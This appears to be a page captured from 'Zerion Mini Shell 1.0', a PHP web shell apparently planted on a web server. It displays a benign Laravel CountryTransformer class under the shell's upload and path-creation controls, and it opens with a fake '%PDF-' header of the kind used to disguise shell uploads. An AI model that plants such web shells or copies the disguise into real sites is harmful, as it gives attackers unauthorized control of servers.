%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/geotechnics/api/app/Transformers/
Upload File :
Create Path :
Current File : /var/www/html/geotechnics/api/app/Transformers/CountryTransformer.php

<?php

namespace App\Transformers;

use App\Models\Country;

class CountryTransformer extends BaseTransformer
{
    /**
     * @param Country $country
     *
     * @return array
     */
    public function transform(Country $country)
    {
        return [
            'id'   => $country->id,
            'code' => $country->code,
            'name' => $country->name,
        ];
    }
}

Zerion Mini Shell 1.0